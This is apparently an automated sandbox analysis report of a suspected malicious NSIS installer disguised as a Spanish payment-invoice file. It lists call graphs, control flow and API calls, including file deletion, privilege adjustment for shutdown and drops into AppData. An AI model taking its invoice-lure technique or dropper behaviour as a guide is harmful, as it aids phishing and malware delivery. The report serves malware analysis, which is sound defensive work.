18 API calls 3472->3473 3474 401fa9 3473->3474 3476 402a3a 18 API calls 3474->3476 3475 401423 25 API calls 3482 4021c9 3475->3482 3477 401fb2 3476->3477 3478 401fc7 LoadLibraryExA 3477->3478 3479 401fba GetModuleHandleA 3477->3479 3480 401fd7 GetProcAddress 3478->3480 3478->3481 3479->3478 3479->3480 3483 402023 3480->3483 3484 401fe6 3480->3484 3481->3475 3485 404f48 25 API calls 3483->3485 3487 401ff6 3484->3487 3489 401423 3484->3489 3485->3487 3487->3482 3488 402044 FreeLibrary 3487->3488 3488->3482 3490 404f48 25 API calls 3489->3490 3491 401431 3490->3491 3491->3487 4019 401490 4020 404f48 25 API calls 4019->4020 4021 401497 4020->4021 3553 401595 3554 402a3a 18 API calls 3553->3554 3555 40159c SetFileAttributesA 3554->3555 3556 4015ae 3555->3556 4022 402616 4023 40261d 4022->4023 4024 40287c 4022->4024 4025 402a1d 18 API calls 4023->4025 4026 402628 4025->4026 4027 40262f SetFilePointer 4026->4027 4027->4024 4028 40263f 4027->4028 4030 405c8d wsprintfA 4028->4030 4030->4024 4031 401717 4032 402a3a 18 API calls 4031->4032 4033 40171e SearchPathA 4032->4033 4034 401739 4033->4034 4035 402519 4036 40252e 4035->4036 4037 40251e 4035->4037 4038 402a3a 18 API calls 4036->4038 4039 402a1d 18 API calls 4037->4039 4040 402535 lstrlenA 4038->4040 4041 402527 4039->4041 4040->4041 4042 402557 4041->4042 4043 405a49 WriteFile 4041->4043 4043->4042 4044 40149d 4045 4014ab PostQuitMessage 4044->4045 4046 40226e 4044->4046 4045->4046 4047 4046a3 4048 4046b3 4047->4048 4049 4046cf 4047->4049 4058 405509 GetDlgItemTextA 4048->4058 4051 404702 4049->4051 4052 4046d5 SHGetPathFromIDListA 4049->4052 4054 4046e5 4052->4054 4057 4046ec SendMessageA 4052->4057 4053 4046c0 SendMessageA 4053->4049 4055 40140b 2 API calls 4054->4055 4055->4057 4057->4051 4058->4053 4059 401ca7 4060 402a1d 18 API calls 4059->4060 4061 401cae 4060->4061 4062 402a1d 18 API calls 4061->4062 4063 401cb6 GetDlgItem 4062->4063 4064 402513 4063->4064 4065 404028 lstrcpynA lstrlenA 3077 40192a 3078 40192c 3077->3078 3079 402a3a 18 API calls 3078->3079 3080 401931 3079->3080 3083 4055d1 3080->3083 3123 40588f 3083->3123 3086 405610 3089 405748 3086->3089 3137 405d2f lstrcpynA 3086->3137 3087 4055f9 DeleteFileA 3088 40193a 3087->3088 3089->3088 3155 406033 FindFirstFileA 3089->3155 3091 405636 3092 405649 3091->3092 3093 40563c lstrcatA 3091->3093 3138 4057e8 lstrlenA 3092->3138 3095 40564f 3093->3095 3097 40565d lstrcatA 3095->3097 3099 405668 lstrlenA FindFirstFileA 3095->3099 3097->3099 3101 40573e 3099->3101 3121 40568c 3099->3121 3100 405766 3158 4057a1 lstrlenA CharPrevA 3100->3158 3101->3089 3103 4057cc CharNextA 3103->3121 3105 405589 5 API calls 3106 405778 3105->3106 3107 405792 3106->3107 3108 40577c 3106->3108 3109 404f48 25 API calls 3107->3109 3108->3088 3113 404f48 25 API calls 3108->3113 3109->3088 3110 40571d FindNextFileA 3112 405735 FindClose 3110->3112 3110->3121 3112->3101 3114 405789 3113->3114 3115 405bea 38 API calls 3114->3115 3118 405790 3115->3118 3117 4055d1 62 API calls 3117->3121 3118->3088 3119 404f48 25 API calls 3119->3110 3120 404f48 25 API calls 3120->3121 3121->3103 3121->3110 3121->3117 3121->3119 3121->3120 3142 405d2f lstrcpynA 3121->3142 3143 405589 3121->3143 3151 405bea MoveFileExA 3121->3151 3161 405d2f lstrcpynA 3123->3161 3125 4058a0 3162 40583a CharNextA CharNextA 3125->3162 3128 4055f1 3128->3086 3128->3087 3129 405f9a 5 API calls 3135 4058b6 3129->3135 3130 4058e1 lstrlenA 3131 4058ec 3130->3131 3130->3135 3133 4057a1 3 API calls 3131->3133 3132 406033 2 API calls 3132->3135 3134 4058f1 GetFileAttributesA 3133->3134 3134->3128 3135->3128 3135->3130 3135->3132 3136 4057e8 2 API calls 3135->3136 3136->3130 3137->3091 3139 4057f5 3138->3139 3140 405806 3139->3140 3141 4057fa CharPrevA 3139->3141 3140->3095 3141->3139 3141->3140 3142->3121 3168 40597d GetFileAttributesA 3143->3168 3146 4055a4 RemoveDirectoryA 3149 4055b2 3146->3149 3147 4055ac DeleteFileA 3147->3149 3148 4055b6 3148->3121 3149->3148 3150 4055c2 SetFileAttributesA 3149->3150 3150->3148 3152 405c0b 3151->3152 3153 405bfe 3151->3153 3152->3121 3171 405a78 lstrcpyA 3153->3171 3156 405762 3155->3156 3157 406049 FindClose 3155->3157 3156->3088 3156->3100 3157->3156 3159 40576c 3158->3159 3160 4057bb lstrcatA 3158->3160 3159->3105 3160->3159 3161->3125 3163 405855 3162->3163 3166 405865 3162->3166 3164 405860 CharNextA 3163->3164 3163->3166 3167 405885 3164->3167 3165 4057cc CharNextA 3165->3166 3166->3165 3166->3167 3167->3128 3167->3129 3169 405595 3168->3169 3170 40598f SetFileAttributesA 3168->3170 3169->3146 3169->3147 3169->3148 3170->3169 3172 405aa0 3171->3172 3173 405ac6 GetShortPathNameA 3171->3173 3198 4059a2 GetFileAttributesA CreateFileA 3172->3198 3174 405be5 3173->3174 3175 405adb 3173->3175 3174->3152 3175->3174 3177 405ae3 wsprintfA 3175->3177 3179 405d51 18 API calls 3177->3179 3178 405aaa CloseHandle GetShortPathNameA 3178->3174 3180 405abe 3178->3180 3181 405b0b 3179->3181 3180->3173 3180->3174 3199 4059a2 GetFileAttributesA CreateFileA 3181->3199 3183 405b18 3183->3174 3184 405b27 GetFileSize GlobalAlloc 3183->3184 3185 405b49 3184->3185 3186 405bde CloseHandle 3184->3186 3187 405a1a ReadFile 3185->3187 3186->3174 3188 405b51 3187->3188 3188->3186 3200 405907 lstrlenA 3188->3200 3191 405b68 lstrcpyA 3194 405b8a 3191->3194 3192 405b7c 3193 405907 4 API calls 3192->3193 3193->3194 3195 405bc1 SetFilePointer 3194->3195 3196 405a49 WriteFile 3195->3196 3197 405bd7 GlobalFree 3196->3197 3197->3186 3198->3178 3199->3183 3201 405948 lstrlenA 3200->3201 3202 405950 3201->3202 3203 405921 lstrcmpiA 3201->3203 3202->3191 3202->3192 3203->3202 3204 40593f CharNextA 3203->3204 3204->3201 4066 4028aa SendMessageA 4067 4028c4 InvalidateRect 4066->4067 4068 4028cf 4066->4068 4067->4068 3533 4015b3 3534 402a3a 18 API calls 3533->3534 3535 4015ba 3534->3535 3536 40583a 4 API calls 3535->3536 3548 4015c2 3536->3548 3537 40161c 3539 401621 3537->3539 3540 40164a 3537->3540 3538 4057cc CharNextA 3538->3548 3541 401423 25 API calls 3539->3541 3542 401423 25 API calls 3540->3542 3543 401628 3541->3543 3550 401642 3542->3550 3552 405d2f lstrcpynA 3543->3552 3544 40548b 2 API calls 3544->3548 3546 401633 SetCurrentDirectoryA 3546->3550 3547 4054a8 5 API calls 3547->3548 3548->3537 3548->3538 3548->3544 3548->3547 3549 401604 GetFileAttributesA 3548->3549 3551 40540e 4 API calls 3548->3551 3549->3548 3551->3548 3552->3546 4069 4016b3 4070 402a3a 18 API calls 4069->4070 4071 4016b9 GetFullPathNameA 4070->4071 4072 4016d0 4071->4072 4073 4016f1 4071->4073 4072->4073 4076 406033 2 API calls 4072->4076 4074 401705 GetShortPathNameA 4073->4074 4075 4028cf 4073->4075 4074->4075 4077 4016e1 4076->4077 4077->4073 4079 405d2f lstrcpynA 4077->4079 4079->4073 4080 4014b7 4081 4014bd 4080->4081 4082 401389 2 API calls 4081->4082 4083 4014c5 4082->4083 4084 401d38 GetDC GetDeviceCaps 4085 402a1d 18 API calls 4084->4085 4086 401d56 MulDiv ReleaseDC 4085->4086 4087 402a1d 18 API calls 4086->4087 4088 401d75 4087->4088 4089 405d51 18 API calls 4088->4089 4090 401dae CreateFontIndirectA 4089->4090 4091 402513 4090->4091 3557 404ebc 3558 404ee0 3557->3558 3559 404ecc 3557->3559 3560 404ee8 IsWindowVisible 3558->3560 3569 404f08 3558->3569 3561 404ed2 3559->3561 3562 404f29 3559->3562 3560->3562 3563 404ef5 3560->3563 3565 403f60 SendMessageA 3561->3565 3564 404f2e CallWindowProcA 3562->3564 3566 404813 5 API calls 3563->3566 3567 404edc 3564->3567 3565->3567 3568 404eff 3566->3568 3568->3569 3569->3564 3570 404893 4 API calls 3569->3570 3570->3562 3571 40173e 3572 402a3a 18 API calls 3571->3572 3573 401745 3572->3573 3574 4059d1 2 API calls 3573->3574 3575 40174c 3574->3575 3576 4059d1 2 API calls 3575->3576 3576->3575 4092 401ebe 4093 402a3a 18 API calls 4092->4093 4094 401ec5 4093->4094 4095 406033 2 API calls 4094->4095 4096 401ecb 4095->4096 4098 401edd 4096->4098 4099 405c8d wsprintfA 4096->4099 4099->4098 4100 40193f 4101 402a3a 18 API calls 4100->4101 4102 401946 lstrlenA 4101->4102 4103 402513 4102->4103

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 40310f-403144 SetErrorMode GetVersion 1 403146-40314e call 4060c8 0->1 2 403157 0->2 1->2 8 403150 1->8 3 40315c-40316f call 40605a lstrlenA 2->3 9 403171-4031e4 call 4060c8 * 2 #17 OleInitialize SHGetFileInfoA call 405d2f GetCommandLineA call 405d2f GetModuleHandleA 3->9 8->2 18 4031f0-403205 call 4057cc CharNextA 9->18 19 4031e6-4031eb 9->19 22 4032ca-4032ce 18->22 19->18 23 4032d4 22->23 24 40320a-40320d 22->24 27 4032e7-403301 GetTempPathA call 4030de 23->27 25 403215-40321d 24->25 26 40320f-403213 24->26 28 403225-403228 25->28 29 40321f-403220 25->29 26->25 26->26 37 403303-403321 GetWindowsDirectoryA lstrcatA call 4030de 27->37 38 403359-403373 DeleteFileA call 402c66 27->38 31 4032ba-4032c7 call 4057cc 28->31 32 40322e-403232 28->32 29->28 31->22 47 4032c9 31->47 35 403234-40323a 32->35 36 40324a-403277 32->36 41 403240 35->41 42 40323c-40323e 35->42 43 403279-40327f 36->43 44 40328a-4032b8 36->44 37->38 55 403323-403353 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030de 37->55 52 403407-403417 call 4035d5 OleUninitialize 38->52 53 403379-40337f 38->53 41->36 42->36 42->41 49 403281-403283 43->49 50 403285 43->50 44->31 46 4032d6-4032e2 call 405d2f 44->46 46->27 47->22 49->44 49->50 50->44 66 40353b-403541 52->66 67 40341d-40342d call 405525 ExitProcess 52->67 56 403381-40338c call 4057cc 53->56 57 4033f7-4033fe call 4036af 53->57 55->38 55->52 68 4033c2-4033cc 56->68 69 40338e-4033b7 56->69 64 403403 57->64 64->52 71 403543-40355c GetCurrentProcess OpenProcessToken 66->71 72 4035bd-4035c5 66->72 78 403433-403447 call 4054a8 lstrcatA 68->78 79 4033ce-4033db call 40588f 68->79 75 4033b9-4033bb 69->75 73 40358e-40359c call 4060c8 71->73 74 40355e-403588 LookupPrivilegeValueA AdjustTokenPrivileges 71->74 76 4035c7 72->76 77 4035cb-4035cf ExitProcess 72->77 90 4035aa-4035b4 ExitWindowsEx 73->90 91 40359e-4035a8 73->91 74->73 75->68 82 4033bd-4033c0 75->82 76->77 88 403454-40346e lstrcatA lstrcmpiA 78->88 89 403449-40344f lstrcatA 78->89 79->52 92 4033dd-4033f3 call 405d2f * 2 79->92 82->68 82->75 88->52 94 403470-403473 88->94 89->88 90->72 95 4035b6-4035b8 call 40140b 90->95 91->90 91->95 92->57 97 403475-40347a call 40540e 94->97 98 40347c call 40548b 94->98 95->72 106 403481-40348e SetCurrentDirectoryA 97->106 98->106 107 403490-403496 call 405d2f 106->107 108 40349b-4034c3 call 405d2f 106->108 107->108 112 4034c9-4034e5 call 405d51 DeleteFileA 108->112 115 403526-40352d 112->115 116 4034e7-4034f7 CopyFileA 112->116 115->112 118 40352f-403536 call 405bea 115->118 116->115 117 4034f9-403519 call 405bea call 405d51 call 4054c0 116->117 117->115 127 40351b-403522 CloseHandle 117->127 118->52 127->115
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE ref: 00403134
                                                                              • GetVersion.KERNEL32 ref: 0040313A
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                              • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                              • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                              • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                              • GetCommandLineA.KERNEL32(Blaggard Setup,NSIS Error), ref: 004031BD
                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",00000000), ref: 004031D0
                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe",00000020), ref: 004031FB
                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                              • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                              • OleUninitialize.OLE32(?), ref: 0040340C
                                                                              • ExitProcess.KERNEL32 ref: 0040342D
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                              • ExitProcess.KERNEL32 ref: 004035CF
                                                                                • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                              • String ID: "$"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$.tmp$1033$Blaggard Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets$C:\Users\user\Desktop$C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
                                                                              • API String ID: 3329125770-2042827967
                                                                              • Opcode ID: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                              • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                              • Opcode Fuzzy Hash: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                              • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 128 4048c5-404911 GetDlgItem * 2 129 404b31-404b38 128->129 130 404917-4049ab GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 128->130 131 404b3a-404b4a 129->131 132 404b4c 129->132 133 4049ba-4049c1 DeleteObject 130->133 134 4049ad-4049b8 SendMessageA 130->134 135 404b4f-404b58 131->135 132->135 136 4049c3-4049cb 133->136 134->133 137 404b63-404b69 135->137 138 404b5a-404b5d 135->138 139 4049f4-4049f8 136->139 140 4049cd-4049d0 136->140 144 404b78-404b7f 137->144 145 404b6b-404b72 137->145 138->137 141 404c47-404c4e 138->141 139->136 146 4049fa-404a26 call 403f14 * 2 139->146 142 4049d2 140->142 143 4049d5-4049f2 call 405d51 SendMessageA * 2 140->143 151 404c50-404c56 141->151 152 404cbf-404cc7 141->152 142->143 143->139 148 404b81-404b84 144->148 149 404bf4-404bf7 144->149 145->141 145->144 185 404af0-404b03 GetWindowLongA SetWindowLongA 146->185 186 404a2c-404a32 146->186 157 404b86-404b8d 148->157 158 404b8f-404ba4 call 404813 148->158 149->141 153 404bf9-404c03 149->153 160 404ea7-404eb9 call 403f7b 151->160 161 404c5c-404c66 151->161 155 404cd1-404cd8 152->155 156 404cc9-404ccf SendMessageA 152->156 163 404c13-404c1d 153->163 164 404c05-404c11 SendMessageA 153->164 165 404cda-404ce1 155->165 166 404d0c-404d13 155->166 156->155 157->149 157->158 158->149 184 404ba6-404bb7 158->184 161->160 169 404c6c-404c7b SendMessageA 161->169 163->141 171 404c1f-404c29 163->171 164->163 172 404ce3-404ce4 ImageList_Destroy 165->172 173 404cea-404cf1 165->173 176 404e69-404e70 166->176 177 404d19-404d25 call 4011ef 166->177 169->160 178 404c81-404c92 SendMessageA 169->178 180 404c3a-404c44 171->180 181 404c2b-404c38 171->181 172->173 182 404cf3-404cf4 GlobalFree 173->182 183 404cfa-404d06 173->183 176->160 179 404e72-404e79 176->179 203 404d35-404d38 177->203 204 404d27-404d2a 177->204 188 404c94-404c9a 178->188 189 404c9c-404c9e 178->189 179->160 191 404e7b-404ea5 ShowWindow GetDlgItem ShowWindow 179->191 180->141 181->141 182->183 183->166 184->149 193 404bb9-404bbb 184->193 192 404b09-404b0d 185->192 194 404a35-404a3b 186->194 188->189 190 404c9f-404cb8 call 401299 SendMessageA 188->190 189->190 190->152 191->160 197 404b27-404b2f call 403f49 192->197 198 404b0f-404b22 ShowWindow call 403f49 192->198 199 404bbd-404bc4 193->199 200 404bce 193->200 201 404ad1-404ae4 194->201 202 404a41-404a69 194->202 197->129 198->160 213 404bc6-404bc8 199->213 214 404bca-404bcc 199->214 217 404bd1-404bed call 40117d 200->217 201->194 208 404aea-404aee 201->208 215 404aa3-404aa5 202->215 216 404a6b-404aa1 SendMessageA 202->216 209 404d79-404d9d call 4011ef 203->209 210 404d3a-404d53 call 4012e2 call 401299 203->210 205 404d2c 204->205 206 404d2d-404d30 call 404893 204->206 205->206 206->203 208->185 208->192 229 404da3 209->229 230 404e3f-404e53 InvalidateRect 209->230 238 404d63-404d72 SendMessageA 210->238 239 404d55-404d5b 210->239 213->217 214->217 218 404aa7-404ab6 SendMessageA 215->218 219 404ab8-404ace SendMessageA 215->219 216->201 217->149 218->201 219->201 232 404da6-404db1 229->232 230->176 234 404e55-404e64 call 4047e6 call 4047ce 230->234 235 404db3-404dc2 232->235 236 404e27-404e39 232->236 234->176 240 404dc4-404dd1 235->240 241 404dd5-404dd8 235->241 236->230 236->232 238->209 242 404d5d 239->242 243 404d5e-404d61 239->243 240->241 245 404dda-404ddd 241->245 246 404ddf-404de8 241->246 242->243 243->238 243->239 248 404ded-404e25 SendMessageA * 2 245->248 246->248 249 404dea 246->249 248->236 249->248
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                              • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                              • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                              • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                              • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                              • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404CE4
                                                                              • GlobalFree.KERNEL32(?), ref: 00404CF4
                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                              • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                              • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                              • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                              • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                              • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 494 405d51-405d5c 495 405d5e-405d6d 494->495 496 405d6f-405d84 494->496 495->496 497 405f77-405f7b 496->497 498 405d8a-405d95 496->498 499 405f81-405f8b 497->499 500 405da7-405db1 497->500 498->497 501 405d9b-405da2 498->501 502 405f96-405f97 499->502 503 405f8d-405f91 call 405d2f 499->503 500->499 504 405db7-405dbe 500->504 501->497 503->502 506 405dc4-405df9 504->506 507 405f6a 504->507 508 405f14-405f17 506->508 509 405dff-405e0a GetVersion 506->509 510 405f74-405f76 507->510 511 405f6c-405f72 507->511 514 405f47-405f4a 508->514 515 405f19-405f1c 508->515 512 405e24 509->512 513 405e0c-405e10 509->513 510->497 511->497 519 405e2b-405e32 512->519 513->512 516 405e12-405e16 513->516 520 405f58-405f68 lstrlenA 514->520 521 405f4c-405f53 call 405d51 514->521 517 405f2c-405f38 call 405d2f 515->517 518 405f1e-405f2a call 405c8d 515->518 516->512 522 405e18-405e1c 516->522 532 405f3d-405f43 517->532 518->532 524 405e34-405e36 519->524 525 405e37-405e39 519->525 520->497 521->520 522->512 528 405e1e-405e22 522->528 524->525 530 405e72-405e75 525->530 531 405e3b-405e5e call 405c16 525->531 528->519 535 405e85-405e88 530->535 536 405e77-405e83 GetSystemDirectoryA 530->536 543 405e64-405e6d call 405d51 531->543 544 405efb-405eff 531->544 532->520 534 405f45 532->534 541 405f0c-405f12 call 405f9a 534->541 538 405ef2-405ef4 535->538 539 405e8a-405e98 GetWindowsDirectoryA 535->539 537 405ef6-405ef9 536->537 537->541 537->544 538->537 542 405e9a-405ea4 538->542 539->538 541->520 547 405ea6-405ea9 542->547 548 405ebe-405ed4 SHGetSpecialFolderLocation 542->548 543->537 544->541 550 405f01-405f07 lstrcatA 544->550 547->548 551 405eab-405eb2 547->551 552 405ed6-405eed SHGetPathFromIDListA CoTaskMemFree 548->552 553 405eef 548->553 550->541 555 405eba-405ebc 551->555 552->537 552->553 553->538 555->537 555->548
                                                                              APIs
                                                                              • GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
                                                                              • GetSystemDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E7D
                                                                              • GetWindowsDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E90
                                                                              • SHGetSpecialFolderLocation.SHELL32(?,0041C205), ref: 00405ECC
                                                                              • SHGetPathFromIDListA.SHELL32(0041C205,Space required: ), ref: 00405EDA
                                                                              • CoTaskMemFree.OLE32(0041C205), ref: 00405EE5
                                                                              • lstrcatA.KERNEL32(Space required: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                              • lstrlenA.KERNEL32(Space required: ,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
